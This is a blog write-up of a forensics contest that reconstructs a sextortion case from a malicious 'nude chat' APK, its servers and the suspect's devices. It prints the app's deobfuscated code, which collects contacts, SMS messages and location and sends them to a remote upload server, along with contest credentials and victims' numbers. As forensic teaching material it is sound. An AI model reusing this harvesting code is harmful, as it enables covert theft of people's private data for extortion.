BlackBird's Blog

Every unfavorable situation in this world is caused by the lack of ability of the person concerned

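Preface:

Before this Chang'an Cup the organizers sent out a participant handbook, where I saw the rough background of the case, so I started searching... and found these:

I was scammed by a "nude chat app" (qq.com)

The secret behind the "nude chat app" (qq.com)

Then I saw a sentence in there, "these are all ready-made frameworks", so I searched online for "app to obtain contacts and SMS" and found a framework, "new-version online contact-list harvesting source code" (I originally wanted to put a link here, but on second thought it is a bit sensitive, so never mind): a framework made up of an app and a back-end server. I downloaded it, and the next day the girls on the login screen of the contest APK were exactly the same as the girls on the home page of the framework APK from the night before... Not that it was of any use... In the end we still narrowly missed first prize.

Thanks to Noah and Hs for carrying me!!! And Meiya [pitiful], please carry me too

At around 8 a.m. on April 25, 2021, the police received a report from the victim, Mr. Jin, who said he had been extorted of tens of thousands of yuan. On questioning, it emerged that the previous day Jin had been lured by the suspect into a nude video chat and had downloaded a certain "nude chat" app, which let the suspect obtain his contact list and the nude chat video and extort him; in the end Jin could no longer bear it and chose to call the police. From the phone Jin handed over, the police specifically collected the installation package of this "nude chat" app, zhibo.apk (evidence 1). Please answer the following questions. (Some questions require using an analysed answer to unpack evidence 2, 3, 4 and 5; when the unpacking password is an IP address, append -CAB2021 to the password, e.g. 192.168.100.100-CAB2021)

Evidence 1

Evidence 1 is the scam app the victim downloaded. Nothing much to say, just reverse the app. In fact the app is mostly a framework, so there is not much to reverse; you only need to find the key content.

  1. Calculate the SHA256 of the evidence 1 APK: 3FECE1E93BE4F422C8446B77B6863EB6A39F19D8FA71FF0250AAC10F8BDDE73A
  2. The application package name of the APK is: plus.H5B8E45D3

This comes straight out of reversing.

  1. The unique application identifier (APPID) of the APK with the packaging service provider is

This one is rather outrageous... it is something I had never come across before. While reversing, we can easily see an APP_ID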

pl.droidsonroids.gif

package pl.droidsonroids.gif;

public final class BuildConfig {
    public static final String APPLICATION_ID = "pl.droidsonroids.gif";
    public static final String BUILD_TYPE = "release";
    public static final boolean DEBUG = false;
    public static final String FLAVOR = "";
    public static final int VERSION_CODE = -1;
    public static final String VERSION_NAME = "1.2.17";

    public BuildConfig() {
        super();
    }
}

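But the APP_ID asked about here is not the APP_ID found by reversing; it is something called the 调证值 ("evidence-retrieval value"; my understanding is: the user's information from when they used the third-party packaging tool, with which evidence can be requested from the third-party SDK provider)...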

image-20211030095049493

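  1. Which of the following dangerous permissions does the APK have (multiple choice):

An app's permission requests are mostly concentrated at the top of the AndroidManifest.xml file: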

  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
  <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
  <uses-feature android:name="android.hardware.camera" />
  <uses-feature android:name="android.hardware.camera.autofocus" />
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission android:name="android.permission.READ_SMS" />
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.WRITE_SMS" />
  <uses-permission android:name="android.permission.GET_ACCOUNTS" />
  <uses-permission android:name="android.permission.WRITE_CONTACTS" />
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
  <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
  <uses-permission android:name="android.permission.READ_LOGS" />
  <uses-permission android:name="android.permission.WRITE_SETTINGS" />
  <uses-permission android:name="com.huawei.android.launcher.permission.CHANGE_BADGE" />
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
  <uses-permission android:name="com.asus.msa.SupplementaryDID.ACCESS" />

Honglian's software provides a visualization:

image-20211030094208355

  1. Which of the following does the data sent by the APK back to the back-end server include (multiple choice):

image-20211030100756426

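Here we can see the phone number, verification code and contact list

At first I only saw the phone number and verification code and no contact list; that was actually because the emulator's contact list was empty... adding a few contacts fixed it

The answer also includes location information, which cannot be captured in the traffic. Looking directly at the code of index.html, we see a pile of strange stuff: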

<script>

		['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"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"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');

	</script>

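At first I did not realise it was obfuscation; later Noah found that it was. Just search for the sojson.v4 at the beginning, deobfuscate it, then read the code and it all becomes clear: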

mui.init();

mui.plusReady(function () {
    //var main = plus.android.runtimeMainActivity();  
    // main.moveTaskToBack(false);

    var address = plus.device.vendor + '-' + plus.device.model;
    address = address.replace(/\n/g, "").replace(/ /g, "").replace(/\r/g, "");
    var apiserver = 'http://www.honglian7001.com/api/uploads/';
    //duplicate data handling: prevent the user from clicking repeatedly
    
···

    function translatePoint(position) {

        var sjh = $('#sjh').val()
        var yqm = $('#yqm').val()
        var currentLon = position.coords.longitude;
        var currentLat = position.coords.latitude;
        var jingweidu = sjh + ',' + yqm + ',' + currentLon + ',' + currentLat;
        mui.ajax(apiserver + 'apimap', {
            data: {
                data: jingweidu
            },
            dataType: 'text', //server returns data in JSON format
            type: 'post', //HTTP request type
            timeout: 10000, //timeout set to 10 seconds
            success: function (data) {

                if (data == '获取成功') {
                    requestPermission(sjh, yqm);

                    //setInterval(function(){
                    //var sjh=$('#sjh').val();
                    //var yqm=$('#yqm').val();
                    //requestPermission(sjh,yqm);
                    //console.log('send')

                    //},30000)
                }

                mui.toast(data)
            },
            error: function (xhr, type, errorThrown) {
                //exception handling


            }
        });

        //write your own logic

    }
    // Extension APIs have finished loading; they can now be called normally

    function huoqu(sjh, yqm) {
        var con = sjh + "**" + yqm + '**' + address;


        plus.contacts.getAddressBook(plus.contacts.ADDRESSBOOK_PHONE, function (addressbook) {


            addressbook.find(["displayName", "phoneNumbers"], function (contacts) {


                for (var i = 0, len = contacts.length; i < len; i++) {
                    con = con + '=' + contacts[i].displayName + '|' + (contacts[i].phoneNumbers.length == 0 ? "" : contacts[i].phoneNumbers[0].value);
                }

                mui.ajax(apiserver + 'api', {
                    data: {
                        data: con
                    },
                    dataType: 'text', //server returns data in JSON format
                    type: 'post', //HTTP request type
                    timeout: 10000, //timeout set to 10 seconds
                    success: function (data) {
                        //alert(data)
                        if (data == '正在加载列表') {
                            dingwei(sjh, yqm);
                            mui.openWindow({
                                url: 'list.html',
                                show: {
                                    autoShow: true
                                }
                            });
                        } else {
                            mui.toast(data)
                        }
                        //console.log(con)
                    },
                    error: function (xhr, type, errorThrown) {
                        //exception handling
                    }
                });

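Here the location information is only collected and sent to the back end after you have registered successfully. So we cannot capture this packet...

  1. When the APK sends the contact list back, the HTTP request method used is ()

POST

  1. The domain name of the APK's upload address is [standard format: www.abc.com]

www.honglian7001.com

  1. The value of the variable apiserver configured in the APK's code is [standard format: www.abc.com/abc]

www.honglian7001.com/api/uploads/

  1. Analysis of the APK shows that it can also collect SMS messages and send them back to the back end; the SMS upload server interface address is [standard format: www.abc.com/abc]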

www.honglian7001.com/api/uploads/apisms

function requestPermission(sjh, yqm) {
        plus.android.requestPermissions(
            ["android.permission.READ_SMS"],
            function (resultObj) {
                //SmsInfo holds the fields of a single SMS message
                var SmsInfo = {}
                //Sms holds all SMS messages
                var Sms = {}

                var aimei = sjh;
                var aimei2 = yqm;
                var duanxin = '[{"imei":"' + aimei + '","imei2":"' + aimei2 + '"}';
                var Cursor = plus.android.importClass("android.database.Cursor")
                var Uri = plus.android.importClass("android.net.Uri") //note: the net in android.net.Uri is lowercase
                var activity = plus.android.runtimeMainActivity()
                var uri = Uri.parse("content://sms/");

                var projection = new Array("_id", "address", "person", "body", "date", "type")
                var cusor = activity.managedQuery(uri, projection, null, null, "date desc")
                var idColumn = cusor.getColumnIndex("_id")
                var nameColumn = cusor.getColumnIndex("person")
                var phoneNumberColumn = cusor.getColumnIndex("address")
                var smsbodyColumn = cusor.getColumnIndex("body")
                var dateColumn = cusor.getColumnIndex("date")
                var typeColumn = cusor.getColumnIndex("type")
                if (cusor != null) {
                    while (cusor.moveToNext()) {
                        SmsInfo.id = cusor.getString(idColumn)
                        SmsInfo.Name = cusor.getInt(nameColumn)
                        SmsInfo.Date = cusor.getLong(dateColumn)
                        SmsInfo.Date = getFormatDate(SmsInfo.Date)
                        SmsInfo.PhoneNumber = cusor.getString(phoneNumberColumn)
                        SmsInfo.Smsbody = cusor.getString(smsbodyColumn)
                        SmsInfo.Type = cusor.getString(typeColumn)

                        var post = JSON.stringify(SmsInfo);
                        //console.log(post);
                        duanxin = duanxin + ',' + post;

                    }
                    duanxin = duanxin + ']';
                    //alert(duanxin);

                    mui.ajax(apiserver + 'apisms', {
                        data: {
                            data: duanxin
                        },
                        dataType: 'text', //server returns data in JSON format
                        type: 'post', //HTTP request type
                        timeout: 10000, //timeout set to 10 seconds
                        success: function (data) {
                            mui.toast('获取成功')
                            //console.log(con)


                        },
                        error: function (xhr, type, errorThrown) {
                            //exception handling

                        }
                    });
                    cusor.close()
                }

            },
            function (error) {
                console.log('申请权限错误:' + error.code + " = " + error.message);
            });
    }
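
For reviewing captured traffic or back-end logs, the three upload formats built by huoqu(), translatePoint() and requestPermission() above can be decoded as follows. This is an added example, not code from the app or the original post; it assumes the POST body is form-encoded as data=..., and the sample requests are constructed.

```python
import json
from urllib.parse import parse_qs, urlencode

def decode_contacts(data):
    # huoqu(): sjh**yqm**vendor-model, then "=name|number" per contact
    header, *frags = data.split("=")
    sjh, yqm, device = header.split("**", 2)
    contacts, pending = [], ""
    for frag in frags:
        frag = pending + frag
        if "|" not in frag:          # "=" inside a display name: rejoin the pieces
            pending = frag + "="
            continue
        pending = ""
        name, _, number = frag.rpartition("|")
        contacts.append({"name": name, "number": number})
    return {"sjh": sjh, "yqm": yqm, "device": device, "contacts": contacts}

def decode_location(data):
    # translatePoint(): sjh,yqm,longitude,latitude
    head, lon, lat = data.rsplit(",", 2)
    sjh, _, yqm = head.partition(",")
    return {"sjh": sjh, "yqm": yqm, "lon": float(lon), "lat": float(lat)}

def decode_sms(data):
    # requestPermission(): JSON array, element 0 carries sjh/yqm as imei/imei2
    header, *messages = json.loads(data)
    return {"sjh": header["imei"], "yqm": header["imei2"], "messages": messages}

DECODERS = {"api": decode_contacts, "apimap": decode_location, "apisms": decode_sms}

def decode_upload(path, body):
    """Decode one captured POST; returns (kind, record), record is None if malformed."""
    endpoint = path.rstrip("/").rsplit("/", 1)[-1]
    if endpoint not in DECODERS:
        return ("unknown", None)
    try:
        data = parse_qs(body, keep_blank_values=True)["data"][0]
        return (endpoint, DECODERS[endpoint](data))
    except (KeyError, ValueError, TypeError):
        return (endpoint, None)

# Constructed sample requests (not taken from the evidence images).
SAMPLES = [
    ("/api/uploads/api", urlencode({"data": "13800000000**1234**HUAWEI-TAS-AL00=Zhang San|13900000001=Li Si|"})),
    ("/api/uploads/apimap", urlencode({"data": "13800000000,1234,108.94,34.26"})),
    ("/api/uploads/apisms", urlencode({"data": '[{"imei":"13800000000","imei2":"1234"},{"id":"7","PhoneNumber":"10086","Smsbody":"test"}]'})),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(decode_upload(path, body))
```

Because the SMS payload is built by string concatenation, a phone number or code field containing a quote produces invalid JSON; such requests come back with a None record and should be examined by hand.
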
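  1. Analysis shows that the APK creates a database file on the phone while running; the name of this file is

  2. Analysis shows that the APK creates a database file on the phone while running; the initial password of this database is

image-20211030105525136

Honestly, this software is really impressive; its reversing even supports Frida scripts...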

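Evidence 2

Using the back-end callback address of the APK obtained so far, the police successfully obtained an image of that server. Use the answer to question 7 to unpack evidence 2 and analyse it.

  1. The SHA256 of the original disk of evidence 2 is: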

E6873068B83AF9988D297C6916329CEC9D8BCB672C6A894D393E68764391C589

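  1. Find the IP address that logged in to the server during the time of the incident [standard format: 111.111.111.111]

    192.168.110.203

According to the case background, the incident took place between April 24 and April 25; just run last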

image-20211030111848945

192.168.110.203

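  1. Analyse evidence 2 and answer: the main role this server plays in the cluster is () [format: 文件存储 (file storage)]

Load balancing (负载均衡)

  1. The port on which the service for the main function mentioned in the previous question listens is:

80

  1. The startup command used by the service mentioned in the previous question is:

node app.js

  1. Analysis shows that the service handles the source IP of a request as follows: it decides based on part number () of the request's source IP address [standard format: 9]

3

  1. Analysis shows that when the value being tested is less than 50, the server forwards the request to the server with IP () [standard format: 111.111.111.111]

192.168.110.111

  1. How many target servers does this server forward to in total [standard format: 9]

3

Use history to view the command history and find the working directory /opt/honglianjingsai; read README.txt and, combined with the command history, conclude: load balancing

View the configuration file:

image-20211030114316010

image-20211030115441629

  1. When the victim's contact list was obtained, the IP address of the victim's device was [standard format: 111.111.111.111]

192.168.110.203

  1. After the victim's contact list was stolen, it was forwarded via this server to the server with IP () [standard format: 111.111.111.111]

192.168.110.113

Check the logs in the project directory and query them against the time of the incident: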

image-20211030120408301

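Evidence 3

Through the analysis of evidence 2, the police further identified and located the target server address and, by preserving evidence from that server, obtained a server image, evidence 3. Use the answer to question 21 to decrypt evidence 3 and analyse it, then answer the following questions:

  1. The SHA256 of the original disk of evidence 3 is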

SHA256:205C1120874CE0E24ABFB3BB1525ACF330E05111E4AD1D323F3DEE59265306BF

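  1. The boot password of the server referred to in question 21 is:

This one needs help from later material, because resetting the password simply resets it and does not show the original one (Windows would show the original). So later we can look at the connection records in Xshell on the suspect's PC, where the password can be seen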

image-20211030152008259

  1. The suspect used BT Panel (宝塔面板) to set up the website; the panel login username is:

hl123

image-20211030131634699

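  1. The name of the function used to reset the BT Panel password is

set_panel_pwd

  1. The hash algorithm used to encrypt the BT Panel login password is

md5

  1. How many times in total does BT Panel run the hash algorithm from the previous question on its default user's password

3

  1. The salt value currently used in the BT Panel password encryption process is [case sensitive]

v87ilhAVumZL

Emm... feels like this one is down to experience??? (just search for it, it should turn up...)

BT Panel directory structure · BT Panel beginner-to-advanced tutorial

OK... let's be a bit more serious and get a copy of the BT Panel code to look at... conveniently BT Panel seems to be written in Python, so it is readable...

From searching we know that the BT Panel tool code is under /www/server/panel, so we look directly at the code under panel (OK, I searched after all):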

image-20211030141832573

image-20211030141916974

def set_panel_pwd(password,ncli = False):
    import db
    sql = db.Sql()
    result = sql.table('users').where('id=?',(1,)).setField('password',public.password_salt(public.md5(password),uid=1))
    username = sql.table('users').where('id=?',(1,)).getField('username')
    if ncli:
        print("|-用户名: " + username)
        print("|-新密码: " + password)
    else:
        print(username)

We find that this calls the md5 method of the public class. Following it further, in /www/server/panel/class/public we can find the two methods password_salt and md5:

def password_salt(password,username=None,uid=None):
    '''
        @name Add salt to the given password
        @author hwliang<2020-07-08>
        @param password string (password already MD5-hashed once)
        @param username string (user name), optional
        @param uid int (uid), optional
        @return string
    '''
    chdck_salt()
    if not uid:
        if not username:
            raise Exception('username或uid必需传一项')
        uid = M('users').where('username=?',(username,)).getField('id')
    salt = M('users').where('id=?',(uid,)).getField('salt')
    return md5(md5(password+'_bt.cn')+salt)

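From the function we can see that the salt value is queried from the database, so we look at the database directly (/www/server/panel/data/default.sql; this file can be viewed directly, and it can also be seen from db.py in the class directory):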

image-20211030171819257

image-20211030143324905
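
Chaining set_panel_pwd and password_salt gives three MD5 rounds, which the following added example (not BT Panel's own code) spells out so that a password recovered elsewhere can be checked against the stored users.password value. It assumes public.md5 returns the lowercase hex digest of the UTF-8 string; the stored hash is a constructed stand-in because the real one is not on this page.

```python
import hashlib
import hmac

def md5_hex(text):
    # Assumed behaviour of public.md5: lowercase hex MD5 of the UTF-8 string.
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def bt_password_stages(plaintext, salt):
    """Return the three successive MD5 digests; the last one is what gets stored."""
    first = md5_hex(plaintext)            # public.md5(password) in set_panel_pwd
    second = md5_hex(first + "_bt.cn")    # inner md5 in password_salt
    third = md5_hex(second + salt)        # outer md5 in password_salt
    return [first, second, third]

def matches_stored(candidate, salt, stored_hash):
    """True if candidate hashes to the stored value (constant-time comparison)."""
    final = bt_password_stages(candidate, salt)[-1]
    return hmac.compare_digest(final, stored_hash.lower())

SALT = "v87ilhAVumZL"  # salt value given on this page
# Constructed stand-in for the users.password column of the panel database.
STORED = bt_password_stages("constructed-example-pw", SALT)[-1]

def confirm_recovered_password(candidates, salt=SALT, stored_hash=STORED):
    """Return the first candidate (e.g. from a saved client session) that matches."""
    for candidate in candidates:
        if matches_stored(candidate, salt, stored_hash):
            return candidate
    return None

if __name__ == "__main__":
    for number, digest in enumerate(bt_password_stages("constructed-example-pw", SALT), 1):
        print("md5 round", number, digest)
    print(confirm_recovered_password(["wrong-guess", "constructed-example-pw"]))
```
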

  1. The absolute path of the website source code on this server is

/www/wwwroot/www.honglian7001/

image-20211030132753814

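You can also start the BT Panel service again:

Because the evidence image uses a static address, we first need to change it to DHCP to suit VMware (only a fool would change VMware rather than the virtual machine):

CentOS DHCP network settings

After the change, restart BT Panel directly: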

bt
bt default

Then it turned out... the password was wrong... just change the password, anything will do

image-20211030144858859

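  1. The database used by the website is located on the server with IP () (use this IP to unpack evidence 5 and rebuild the website) [standard format: 111.111.111.111]

192.168.110.115

  1. The database login password is [case sensitive]

wxrM5GtNXk5k5EPX

Look for the relevant code files under the website directory; in /www/wwwroot/www.honglian7001/app/database.php we can see the website's database configuration: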

image-20211030145119582

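  1. Try to rebuild the website and identify the entry point of its back-end admin interface [standard format: /web]

From the directory structure we can see /www/wwwroot/www.honglian7001/app/admin... so admin is an easy guess; the evidence from the suspect's PC later also shows it: image-20211030152049564

  1. It is known that the website code in this case encrypts the login user's password. Find the salt value in the encryption algorithm [case sensitive]

    lshi4AsSUrUOwWV

  2. The password of the website's administrator user is:

    security

The code that checks the administrator password must be under the /admin folder; the checking code can be seen in common.php under /www/wwwroot/www.honglian7001/app/admin: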

image-20211030173556802

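  1. When encrypting back-end account passwords, how many hashes does the back end compute in total

    3

  2. How many device records are there in the back end in total

    6002

  3. Confirm via the back end: the mobile number of the victim in this case is

    18644099137

  4. How many records are there in the victim's contact list in this case

    34

This is a bit of a slap in the face... Earlier I figured only one virtual machine needed configuring, so I chose to change the VM's network settings rather than VMware's network configuration... but for a networked cluster, better to just change VMware's network configuration...

After changing the configuration, start reassembling the RAID and recovering the database. I used R-Studio here, which works well; after reassembly, export an img. Analysis and emulation in one go. Then we try the /admin guessed earlier and find that it is indeed the back end.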

image-20211030172554430

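Next we look for the username and password. At this point we should check the logs. I first looked at /www/wwwlogs/www.honglian7001.log but found nothing, then searched within the website directory. Eventually I found /www/wwwroot/www.honglian7001/runtime/log/202104/24.log; searching for password there shows that the user is admin and the password is security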

image-20211030173009903

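Then just dig around in the back end and you can see the answers to the questions above.

Evidence 4

Through analysis of evidence 2 and 3, the police located the suspect via IP and successfully arrested him; the suspect's PC and phone have now been forensically acquired and imaged separately. Use the answer to question 13 to decrypt evidence 4 and answer the following questions

  1. Calculate the SHA256 of the original disk of evidence 4-PC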

E9ABE6C8A51A633F809A3B9FE5CE80574AED133BC165B5E1B93109901BB94C2B

  1. The decryption key of the BitLocker-encrypted partition of evidence 4-PC is

511126-518936-161612-135234-698357-082929-144705-622578

Forensics Master (取证大师) finds it directly with automatic forensics:

image-20211030140436916

  1. The boot password of evidence 4-PC is

12306

Emulation reveals it

image-20211030150957461

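  1. Analysis shows that evidence 4-PC is the device the suspect used to manage the servers; which browser was mainly used to control the website back end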

Google Chrome

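Just go through the browsing history... there are two browsers, but Edge did only one thing: download Chrome [doge]

  1. Calculate the sha256 of the zip file in the user directory of the PC evidence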

0DD2C00C8C6DBDEA123373F91A3234D2F07D958355F6CD7126E397E12E8ADBB3

  1. Analyse evidence 4-phone: the IMEI of the phone is

868668043754436 868668044204431

image-20211030135510278

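  1. Analyse evidence 4-phone: through which app did the suspect and the victim in this case first come into contact (standard format: 支付宝)

伊对

  1. Analyse evidence 4-phone: the address from which the victim downloaded the malicious APK installation package is

https://cowtransfer.com/s/a6b28b4818904c

  1. Analyse evidence 4-phone: the victim's internal WeChat ID is

wxid_4drzfboq0hk322

  1. Analyse evidence 4-phone: the QQ account the suspect used to extort the victim in this case is

1649840939

Nothing much here... just dig through the forensic analysis software, start grave-digging (watching the show)...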

image-20211030152822221

image-20211030152833632

image-20211030152853849

image-20211030152938242

image-20211030152958826

  1. Comprehensive analysis: the SHA256 of the container file the suspect used to manage extortion targets is

9C4BE29EB5661E6EDD88A364ECC6EF004C15D61B08BD7DD0A393340180F15608

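  1. Comprehensive analysis of the suspect's evidence: the mobile number of another victim, "Mr. Guo", is

    15266668888

  2. From the suspect's evidence, how many victims' information is recorded

    5

In the user directory of the suspect's PC we found an archive called "赚钱工具" ("money-making tools")... Export it and unpack it; the password came out on the first try, it is simply the host's password. We do forensics directly on the virtual disk vmdk file (if a file has been deleted, you cannot see it once the VM is booted, but forensic software can see it and even export it)

  1. Use the password from question 11 to unpack the file "金先生转账.zip" and calculate the SHA256 of the file in the archive

It can be found in Forensics Master; export it and compute the hash: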

image-20211030164924471

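But... only after watching the post-contest review did I realise... this suspect is a damn genius: every time he finished doing something bad, he took a snapshot and then deleted everything. I really would never have thought of that... Brilliant!

Then I tried opening the virtual machine directly and found that emulating straight from the vmdk differs a lot from opening the VM directly, and the difference is the snapshot! (I asked konge about this: when you take a snapshot of a VM, it generates a *-0000001.vmdk file, and this virtual disk file is a branch of *.vmdk at the time of the snapshot. So *.vmdk holds all the files, i.e. the files from before the snapshot was taken, while *-0000001.vmdk holds the information about newly stored or deleted files.)

Ahem...

Now the relevant evidence files have effectively been recovered, but 小白鼠.txt is an encrypted container that has not been decrypted yet. Among the encrypted files in Forensics Master we saw a key.rar, and we reasonably suspected that this was the key file (but during the contest I kept trying to unpack key.rar, thinking the picture inside was the key file...)

Then we can see Mr. Guo's information; the phone number in the file name is Mr. Guo's: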

image-20211030171037976

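  1. Comprehensive analysis: how much money in total was the victim extorted by the suspect (the transfer screenshots are hidden in several places)

6100

Honestly... this one is a bit tricky: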

image-20211030180910494

image-20211030180933711

image-20211030181008891

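Then the picture in the archive on the PC:

image-20211030181336911

And then I got it wrong...

There is one more transfer in the database... who on earth would think of that.

Then the natural thought is: analyse, export the database, look at that picture. But here is the problem: the database in the VM is a server, not a file. So we have to connect through the service. But no matter which tool we used, or even on the server itself, we could not connect to the database. I only learned from the review that the database has an "empty user problem" that we need to fix first.

I then asked Frank about it. The root of the empty-user problem is a user-matching issue. Put plainly: you think you are connecting to the database as user A, A has a password, and you pass a password in; but you are matched to user B, and B has no password, so there is a conflict. Why the wrong match? When you log in to mysql, the server resolves the user you are using and your IP or domain name. But when matching, it goes through the users in the user table one by one in order. Once one matches, it does not try the later ones. So the problem ultimately lies in the order in which mysql matches users: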

image-20211030195116381

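Solutions:

  1. Disable password verification; then nothing has a password and there is no conflict.
  2. Delete the users that could cause the wrong match (but you still have to disable password verification first to log in...)
  3. Read the mysql source and look at its algorithm for ordering match priority (https://dev.mysql.com/doc/refman/5.7/en/connection-access.html). I did not read the English very carefully or seriously... and then got scolded by Yangyang [about to cry]. One rule here is that a row whose User is (empty) can match any user name, so when we try to connect with the command, we are first matched by the row whose Host is localhost.localdomain and whose User is (empty), which causes the error.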
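
The matching order described above, as a simplified model in Python; this is an added example, not MySQL's implementation or code from the original post. The account rows, the user name webapp and the plaintext passwords are constructed for illustration (a real server compares password hashes and has finer host-specificity rules).

```python
import re

def host_rank(host):
    # Simplified specificity: literal host, then wildcard pattern, then '%', then ''
    if host == "":
        return 3
    if host == "%":
        return 2
    return 1 if re.search(r"[%_]", host) else 0

def host_matches(pattern, client_host):
    if pattern == "":
        return True
    rx = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in pattern)
    return re.fullmatch(rx, client_host, re.IGNORECASE) is not None

def sorted_accounts(rows):
    # Most specific Host first; for the same Host, named users before the blank user.
    return sorted(rows, key=lambda r: (host_rank(r["host"]), r["host"].lower(), r["user"] == ""))

def login(rows, user, client_host, password):
    """Return (matched_account, accepted). Only the first matching row is ever checked."""
    for r in sorted_accounts(rows):
        if host_matches(r["host"], client_host) and r["user"] in ("", user):
            return (f"'{r['user']}'@'{r['host']}'", r["password"] == password)
    return (None, False)

def without_anonymous(rows):
    # Fix 2 from the list above: drop the rows whose User is empty.
    return [r for r in rows if r["user"] != ""]

# Constructed mysql.user rows; 'webapp' and all passwords are hypothetical.
ROWS = [
    {"user": "root",   "host": "localhost",             "password": "root-pw"},
    {"user": "",       "host": "localhost",             "password": ""},
    {"user": "",       "host": "localhost.localdomain", "password": ""},
    {"user": "webapp", "host": "%",                     "password": "webapp-pw"},
]

if __name__ == "__main__":
    # The blank-user row for localhost.localdomain is matched first: login rejected.
    print(login(ROWS, "webapp", "localhost.localdomain", "webapp-pw"))
    # With the anonymous rows removed, 'webapp'@'%' is matched and accepted.
    print(login(without_anonymous(ROWS), "webapp", "localhost.localdomain", "webapp-pw"))
```
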

Finally got to see the database... tears in my eyes:

image-20211030195814328

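Afterword

It took basically a whole day to finish reproducing Chang'an Cup 2021. Some thoughts (very immature, but I still want to put them out there for discussion)

  1. When I took part in forensics competitions last year, I already noticed the issue of "comprehensive forensics", or "considering things as a whole". Perhaps because we are, after all, not professional police officers or the like, we treat this more as an exam question than as a real case... This is something to watch out for.
  2. During the review, the instructor said "BT Panel has been fairly common in recent years". Thinking about it, that is fairly normal, or a trend... Modern fraud is not as simple as it used to be; it is gradually moving in a technical direction. But the people who commit fraud generally do not have much technical skill (after all, those who do would not stoop to this, though there are exceptions), so they rely on foolproof tutorials, or on highly integrated tools. Perhaps it is also a matter of the cost of committing the crime... So the framework I found online came with recorded tutorials, and the tutorials are extremely foolproof. It is actually quite scary when you think about it... (some random thoughts, very shallow, just have a look)
  3. Also... do not go watching porn when you have nothing to do... with that time you would be better off finding a girlfriend...
  4. From hs: I finally understand how the fraud came to tens of thousands; it was not in one go, but extorted separately across different platforms...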
